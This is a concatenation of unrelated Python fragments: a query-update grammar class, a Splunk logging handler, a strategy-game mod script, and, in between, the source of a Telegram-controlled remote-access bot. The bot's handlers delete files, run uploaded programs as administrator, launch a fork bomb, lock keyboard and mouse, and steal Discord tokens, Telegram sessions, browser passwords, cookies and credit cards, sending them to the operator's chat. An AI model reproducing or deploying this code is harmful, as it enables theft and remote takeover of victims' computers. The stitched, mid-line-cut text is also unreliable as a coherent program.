class AssignmentRule(ColumnUpdateRule):
"""matches if the a value is exactly equal to the given
this works for text or integers
"""
def __repr__(self):
return "<%s = %s>"%(self.column, self.fmtval(self.value))
def sql(self):
return "%s = ?"%(self.column,), (self.value,)
class MetaUpdateRule(UpdateRule):
"""group one or more update rules"""
def __init__(self, rules):
super(MetaUpdateRule, self).__init__()
self.rules = rules
class AndUpdateRule(MetaUpdateRule):
"""MetaSearchRule which checks that all rules return true"""
def __repr__(self):
return "<" + ' '.join(map(repr,self.rules)) + ">"
def sql(self):
sql = []
vals = []
sqlstr= ""
for rule in self.rules:
x = rule.sql()
sql.append(x[0])
vals.extend(x[1])
if sql:
sqlstr = ', '.join(sql)
return sqlstr, tuple(vals)
class UpdateGrammar(Grammar):
def __init__(self):
super(UpdateGrammar, self).__init__()
def compile_operators(self):
self.all_text = 'text'
# sigil is used to define the oldstyle syntax marker
# it should not appear in tok_special
self.sigil = '.'
# tokens control how the grammar is parsed.
self.tok_whitespace = " \t" # token separators
# all meaningful non-text chars
self.tok_operators = '~!=<>()|&'
self.tok_flow = ""
self.tok_special = self.tok_operators + self.tok_flow
self.tok_negate = None
self.tok_nest_begin = None
self.tok_nest_end = None
self.tok_quote = "\""
self.tok_escape = "\\"
# does not require left token
self.operators = {
}
self.operators_invert = {}
# require left/right token
self.special = {
"=" :AssignmentRule,
"==":AssignmentRule,
}
self.special_invert = {}
# meta optins can be used to control the query results
# by default, limit could be used to limit the number of results
self.meta_columns = set([Grammar.META_DEBUG])
self.meta_options = dict()
self.old_style_operators = self.operators.copy()
self.old_style_operators.update(self.special)
self.old_style_operators_invert = self.operators_invert.copy()
self.old_style_operators_invert.update(self.special_invert)
self.operators_flow = {
}
self.operators_flow_invert = { v:k for k,v in self.operators_flow.items() }
self.operators_flow_join = AndUpdateRule
def buildRule(self, colid, rule ,value):
"""
this must be expanded to support new data formats.
"""
col = self.translateColumn( colid )
if col == self.all_text:
return self.allTextRule(rule, value)
elif col in self.text_fields:
return rule( col, value )
elif col in self.date_fields:
return self.buildDateRule(col, rule, | |
<reponame>jay-johnson/spylunking
"""
Including a handler derived from the original repository:
https://github.com/zach-taylor/splunk_handler
This version was built to fix issues seen
with multiple Celery worker processes.
Available environment variables:
::
export SPLUNK_HOST="<splunk host>"
export SPLUNK_PORT="<splunk port: 8088>"
export SPLUNK_API_PORT="<splunk port: 8089>"
export SPLUNK_ADDRESS="<splunk address host:port>"
export SPLUNK_API_ADDRESS="<splunk api address host:port>"
export SPLUNK_TOKEN="<splunk token>"
export SPLUNK_INDEX="<splunk index>"
export SPLUNK_SOURCE="<splunk source>"
export SPLUNK_SOURCETYPE="<splunk sourcetype>"
export SPLUNK_VERIFY="<verify certs on HTTP POST>"
export SPLUNK_TIMEOUT="<timeout in seconds>"
export SPLUNK_QUEUE_SIZE="<num msgs allowed in queue - 0=infinite>"
export SPLUNK_SLEEP_INTERVAL="<sleep in seconds per batch>"
export SPLUNK_RETRY_COUNT="<attempts per log to retry publishing>"
export SPLUNK_RETRY_BACKOFF="<cooldown in seconds per failed POST>"
export SPLUNK_DEBUG="<1 enable debug|0 off>"
"""
import sys
import atexit
import traceback
import multiprocessing
import threading
import json
import logging
import socket
import time
import requests
import spylunking.send_to_splunk as send_to_splunk
from threading import Timer
from spylunking.rnow import rnow
from spylunking.ppj import ppj
from spylunking.consts import SPLUNK_HOST
from spylunking.consts import SPLUNK_PORT
from spylunking.consts import SPLUNK_TOKEN
from spylunking.consts import SPLUNK_INDEX
from spylunking.consts import SPLUNK_SOURCE
from spylunking.consts import SPLUNK_SOURCETYPE
from spylunking.consts import SPLUNK_VERIFY
from spylunking.consts import SPLUNK_TIMEOUT
from spylunking.consts import SPLUNK_SLEEP_INTERVAL
from spylunking.consts import SPLUNK_RETRY_COUNT
from spylunking.consts import SPLUNK_RETRY_BACKOFF
from spylunking.consts import SPLUNK_QUEUE_SIZE
from spylunking.consts import SPLUNK_DEBUG
from requests.packages.urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
is_py2 = sys.version[0] == '2'
if is_py2:
from Queue import Queue # noqa
else:
from queue import Queue # noqa
# For keeping track of running class instances
instances = []
# Called when application exit imminent (main thread ended / got kill signal)
@atexit.register
def perform_exit():
"""perform_exit
Handling at-the-exit events
---------------------------
This will cleanup each worker process which
could be in the middle of a request/sleep/block
action. This has been tested on python 3 with
Celery and single processes.
"""
if SPLUNK_DEBUG:
print('{} -------------------------------'.format(
rnow()))
print('{} splunkpub: atexit.register - start'.format(
rnow()))
worked = True
for instance in instances:
try:
if SPLUNK_DEBUG:
print('{} - shutting down instance={} - start'.format(
rnow(),
instance))
instance.shutdown()
if SPLUNK_DEBUG:
print('{} - shutting down instance={} - done'.format(
rnow(),
instance))
except Exception as e:
worked = False
if SPLUNK_DEBUG:
print(
'{} - shutting down instance={} '
'- hit ex={} during shutdown'.format(
rnow(),
instance,
e))
# end of try/ex
if not worked:
if SPLUNK_DEBUG:
print('{} Failed exiting'.format(
rnow()))
if SPLUNK_DEBUG:
print('{} splunkpub: atexit.register - done'.format(
rnow()))
print('{} -------------------------------'.format(
rnow()))
# end of perform_exit
def force_flush():
"""force_flush"""
if SPLUNK_DEBUG:
print('{} -------------------------------'.format(
rnow()))
print('{} splunkpub: force_flush - start'.format(
rnow()))
worked = True
for instance in instances:
try:
instance.force_flush()
except Exception as e:
worked = False
if SPLUNK_DEBUG:
print(
'{} - force_flush instance={} '
'- hit ex={}'.format(
rnow(),
instance,
e))
# end of try/ex
if not worked:
if SPLUNK_DEBUG:
print('{} Failed flushing queues'.format(
rnow()))
if SPLUNK_DEBUG:
print('{} splunkpub: force_flush - done'.format(
rnow()))
print('{} -------------------------------'.format(
rnow()))
# end of force_flush
class SplunkPublisher(logging.Handler):
"""
A logging handler to send logs to a Splunk Enterprise instance
running the Splunk HTTP Event Collector.
Originally inspired from the repository:
https://github.com/zach-taylor/splunk_handler
This class allows multiple processes like Celery workers
to reliably publish logs to Splunk from inside of a Celery task
"""
def __init__(
self,
host=None,
port=None,
address=None,
token=None,
index=None,
hostname=None,
source=None,
sourcetype='text',
verify=True,
timeout=60,
sleep_interval=2.0,
queue_size=0,
debug=False,
retry_count=20,
retry_backoff=2.0,
run_once=False):
"""__init__
Initialize the SplunkPublisher
:param host: Splunk fqdn
:param port: Splunk HEC Port 8088
:param address: Splunk fqdn:8088 - overrides host and port
:param token: Pre-existing Splunk token
:param index: Splunk index
:param hostname: Splunk address <host:port>
:param source: source for log records
:param sourcetype: json
:param verify: verify using certs
:param timeout: HTTP request timeout in seconds
:param sleep_interval: Flush the queue of logs interval in seconds
:param queue_size: Queue this number of logs before dropping
new logs with 0 is an infinite number of messages
:param debug: debug the publisher
:param retry_count: number of publish retries per log record
:param retry_backoff: cooldown timer in seconds
:param run_once: test flag for running this just one time
"""
global instances
instances.append(self)
logging.Handler.__init__(self)
self.host = host
if self.host is None:
self.host = SPLUNK_HOST
self.port = port
if self.port is None:
self.port = SPLUNK_PORT
if address:
address_split = address.split(':')
self.host = address_split[0]
self.port = int(address_split[1])
self.token = token
if self.token is None:
self.token = SPLUNK_TOKEN
self.index = index
if self.index is None:
self.index = SPLUNK_INDEX
self.source = source
if self.source is None:
self.source = SPLUNK_SOURCE
self.sourcetype = sourcetype
if self.sourcetype is None:
self.sourcetype = SPLUNK_SOURCETYPE
self.verify = verify
if self.verify is None:
self.verify = SPLUNK_VERIFY
self.timeout = timeout
if self.timeout is None:
self.timeout = SPLUNK_TIMEOUT
self.sleep_interval = sleep_interval
if self.sleep_interval is None:
self.sleep_interval = SPLUNK_SLEEP_INTERVAL
self.retry_count = retry_count
if self.retry_count is None:
self.retry_count = SPLUNK_RETRY_COUNT
self.retry_backoff = retry_backoff
if self.retry_backoff is None:
self.retry_backoff = SPLUNK_RETRY_BACKOFF
self.queue_size = queue_size
if self.queue_size is None:
self.queue_size = SPLUNK_QUEUE_SIZE
self.log_payload = ''
self.timer = None
self.tid = None
self.manager = multiprocessing.Manager()
self.queue = self.manager.Queue(maxsize=self.queue_size)
self.session = requests.Session()
self.shutdown_event = multiprocessing.Event()
self.shutdown_ack = multiprocessing.Event()
self.already_done = multiprocessing.Event()
self.testing = False
self.shutdown_now = False
self.run_once = run_once
self.debug_count = 0
self.debug = debug
if SPLUNK_DEBUG:
self.debug = True
self.debug_log('starting debug mode')
if hostname is None:
self.hostname = socket.gethostname()
else:
self.hostname = hostname
self.debug_log('preparing to override loggers')
# prevent infinite recursion by silencing requests and urllib3 loggers
logging.getLogger('requests').propagate = False
logging.getLogger('urllib3').propagate = False
# and do the same for ourselves
logging.getLogger(__name__).propagate = False
# disable all warnings from urllib3 package
if not self.verify:
requests.packages.urllib3.disable_warnings()
# Set up automatic retry with back-off
self.debug_log('preparing to create a Requests session')
retry = Retry(
total=self.retry_count,
backoff_factor=self.retry_backoff,
method_whitelist=False, # Retry for any HTTP verb
status_forcelist=[500, 502, 503, 504])
self.session.mount('https://', HTTPAdapter(max_retries=retry))
self.start_worker_thread(
sleep_interval=self.sleep_interval)
self.debug_log((
'READY init - sleep_interval={}').format(
self.sleep_interval))
# end of __init__
def emit(
self,
record):
"""emit
Emit handler for queue-ing message for
the helper thread to send to Splunk on the ``sleep_interval``
:param record: LogRecord to send to Splunk
https://docs.python.org/3/library/logging.html
"""
self.debug_log('emit')
try:
record = self.format_record(
record)
except Exception as e:
self.write_log(
'Exception in Splunk logging handler={}'.format(e))
self.write_log(
traceback.format_exc())
return
if self.sleep_interval > 0:
try:
self.debug_log('put in queue')
# Put log message into queue; worker thread will pick up
self.queue.put_nowait(
record)
except Exception:
self.write_log(
'log queue full - log data will be dropped.')
else:
# Flush log immediately; is blocking call
self.publish_to_splunk(
payload=record)
# end of emit
def start_worker_thread(
self,
sleep_interval=1.0):
"""start_worker_thread
Start the helper worker thread to publish queued messages
to Splunk
:param sleep_interval: sleep in seconds before reading from
the queue again
"""
# Start a worker thread responsible for sending logs
if self.sleep_interval > 0:
self.debug_log(
'starting worker thread')
self.timer = Timer(
sleep_interval,
self.perform_work)
self.timer.daemon = True # Auto-kill thread if main process exits
self.timer.start()
# end of start_worker_thread
def write_log(
self,
log_message):
"""write_log
Write logs to stdout
:param log_message: message to log
"""
print('{} splunkpub {}'.format(
rnow(),
log_message))
# end of write_log
def debug_log(
self,
log_message):
"""debug_log
Write logs that only show up in debug mode.
To turn on debugging with environment variables
please set this environment variable:
::
export SPLUNK_DEBUG="1"
:param log_message: message to log
"""
if self.debug:
print('{} splunkpub DEBUG {}'.format(
rnow(),
log_message))
# end of debug_log
def format_record(
self,
record):
"""format_record
Convert a log record into a Splunk-ready format
:param record: message to format
"""
self.debug_log('format_record - start')
if self.source is None:
source = record.pathname
else:
source = self.source
current_time = time.time()
params = {
'time': current_time,
'host': self.hostname,
'index': self.index,
'source': source,
'sourcetype': self.sourcetype,
'event': self.format(record),
}
self.debug_log('record dictionary created')
formatted_record = json.dumps(params, sort_keys=True)
self.debug_log('format_record - done')
return formatted_record
# end of format_record
def build_payload_from_queued_messages(
self,
use_queue,
shutdown_event,
triggered_by_shutdown=False):
"""build_payload_from_queued_messages
Empty the queued messages by building a large ``self.log_payload``
:param use_queue: queue holding the messages
:param shutdown_event: shutdown event
:param triggered_by_shutdown: called during shutdown
"""
self.debug_log('build_payload - start')
not_done = True
while not_done:
if not triggered_by_shutdown and self.is_shutting_down(
shutdown_event=shutdown_event):
self.debug_log(
'build_payload shutting down')
return True
self.debug_count += 1
if self.debug_count > 60:
self.debug_count = 0
self.debug_log('build_payload tid={} queue={}'.format(
self.tid,
str(use_queue)))
try:
msg = use_queue.get(
block=True,
timeout=self.sleep_interval)
self.log_payload = self.log_payload + msg
if self.debug:
self.debug_log('{} got={}'.format(
self,
ppj(msg)))
not_done = not self.queue_empty(
use_queue=use_queue)
except Exception as e:
if self.is_shutting_down(
shutdown_event=shutdown_event):
self.debug_log(
'helper was shut down '
'msgs in the queue may not all '
'have been sent')
if ('No such file | |
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'_Folder_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.send_message(command.chat.id,
'_Removed_ *' + str(c) + '* _files out of_ *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
r = requests.get(URL, allow_redirects=True)
File = os.getcwd() + '\\' + os.path.basename(r.URL)
open(File, 'wb').write(r.content)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + File + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory_', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB_', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, '_File_ *' + File + '* _is running!_', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_The file is isolated by the system and cannot be running_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* is running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
try:
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Failed to get process list!_', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, '_Process_ *' + Process + '* _is was stopped!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + str(WindowTitle()) + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message is was sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL is was opened!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
try:
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
file_info = bot.get_file(command.photo[len(command.photo)-1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = Directory + file_info.file_path;
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_The photo is set on the wallpapers!_', parse_mode='Markdown')
except:
pass
# Infinite start CMD.exe
@bot.message_handler(regexp='/Forkbomb')
def Forkbomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
ForkBomb()
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed!_', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramGrab(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found!_', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found!_', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found!_', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_Display is was rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_Monitor is was Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_Monitor is was On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights!_', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds_', | |
from Events import handler
from RiseAndFall import *
from RFCUtils import *
from Core import *
from Locations import *
dRelocatedCapitals = CivDict({
iPhoenicia : tCarthage,
iMongols : tBeijing,
iOttomans : tConstantinople
})
dCapitalInfrastructure = CivDict({
iPhoenicia : (3, [], []),
iByzantium : (5, [iBarracks, iWalls, iLibrary, iMarket, iGranary, iHarbor, iForge], [temple]),
iPortugal : (5, [iLibrary, iMarket, iHarbor, iLighthouse, iForge, iWalls], [temple]),
iItaly : (7, [iLibrary, iPharmacy, iMarket, iArtStudio, iAqueduct, iJail, iWalls], [temple]),
iNetherlands : (9, [iLibrary, iMarket, iWharf, iLighthouse, iBarracks, iPharmacy, iBank, iArena, iTheatre], [temple]),
})
### CITY ACQUIRED ###
@handler("cityAcquired")
def relocateAcquiredCapital(iOwner, iPlayer, city):
relocateCapitals(iPlayer, city)
@handler("cityAcquired")
def buildAcquiredCapitalInfrastructure(iOwner, iPlayer, city):
buildCapitalInfrastructure(iPlayer, city)
### FIRST CITY ###
@handler("firstCity")
def createAdditionalPolishSettler(city):
iPlayer = city.getOwner()
if city.isCapital() and civ(iPlayer) == iPoland and not player(iPlayer).isHuman():
locations = {
tMemel: 1,
tKoenigsberg: 1,
tGdansk: 3,
}
location = weighted_random_entry(locations)
makeUnit(iPlayer, iSettler, location)
makeUnit(iPlayer, iCrossbowman, location)
### CITY BUILT ###
@handler("cityBuilt")
def relocateFoundedCapital(city):
relocateCapitals(city.getOwner(), city)
@handler("cityBuilt")
def buildFoundedCapitalInfrastructure(city):
buildCapitalInfrastructure(city.getOwner(), city)
@handler("cityBuilt")
def createCarthaginianDefenses(city):
if at(city, tCarthage) and civ(city) == iPhoenicia and not player(city).isHuman():
makeUnit(iPhoenicia, iWorkboat, tCarthage, UnitAITypes.UNITAI_WORKER_SEA)
makeUnit(iPhoenicia, iGalley, direction(tCarthage, DirectionTypes.DIRECTION_NORTHWEST), UnitAITypes.UNITAI_SETTLER_SEA)
makeUnit(iPhoenicia, iSettler, direction(tCarthage, DirectionTypes.DIRECTION_NORTHWEST), UnitAITypes.UNITAI_SETTLE)
if player(iRome).isHuman():
city.setHasRealBuilding(iWalls, True)
makeUnits(iPhoenicia, iArcher, tCarthage, 2, UnitAITypes.UNITAI_CITY_DEFENSE)
makeUnits(iPhoenicia, iNumidianCavalry, tCarthage, 3)
makeUnits(iPhoenicia, iWarElephant, tCarthage, 2, UnitAITypes.UNITAI_CITY_COUNTER)
### UNIT BUILT ###
lChineseCities = [tBeijing, tKaifeng, tLuoyang, tShanghai, tHangzhou, tGuangzhou, tHaojing]
@handler("unitBuilt")
def foundChineseCity(city, unit):
if unit.isFound() and civ(unit) == iChina and not player(unit).isHuman():
plot = plots.of(lChineseCities).where(lambda plot: isFree(unit.getOwner(), plot, True, True, True)).random()
if plot:
plot.setOwner(unit.getOwner())
player(unit).found(plot.getX(), plot.getY())
unit.kill(False, -1)
### BEGIN GAME TURN ###
@handler("BeginGameTurn")
def placeGoodyHuts(iGameTurn):
if iGameTurn == scenarioStartTurn() + 3:
if scenario() == i3000BC:
placeHut((101, 38), (107, 41)) # Southern China
placeHut((62, 45), (67, 50)) # Balkans
placeHut((69, 42), (76, 46)) # Asia Minor
if scenario() <= i600AD:
placeHut((49, 40), (54, 46)) # Iberia
placeHut((57, 51), (61, 56)) # Denmark / Northern Germany
placeHut((48, 55), (49, 58)) # Ireland
placeHut((50, 53), (54, 60)) # Britain
placeHut((57, 57), (65, 65)) # Scandinavia
placeHut((73, 53), (81, 58)) # Russia
placeHut((81, 43), (86, 47)) # Transoxania
placeHut((88, 30), (94, 36)) # Deccan
placeHut((110, 40), (113, 43)) # Shikoku
placeHut((114, 49), (116, 52)) # Hokkaido
placeHut((85, 53), (99, 59)) # Siberia
placeHut((103, 24), (109, 29)) # Indonesia
placeHut((68, 17), (72, 23)) # East Africa
placeHut((65, 10), (70, 16)) # South Africa
placeHut((22, 48), (29, 51)) # Great Lakes
placeHut((18, 44), (22, 52)) # Great Plains
placeHut((34, 25), (39, 29)) # Amazonas Delta
placeHut((33, 9), (37, 15)) # Parana Delta
placeHut((25, 36), (32, 39)) # Caribbean
placeHut((107, 19), (116, 22)) # Northern Australia
placeHut((114, 10), (118, 17)) # Western Australia
placeHut((120, 5), (123, 11)) # New Zealand
placeHut((59, 25), (67, 28)) # Central Africa
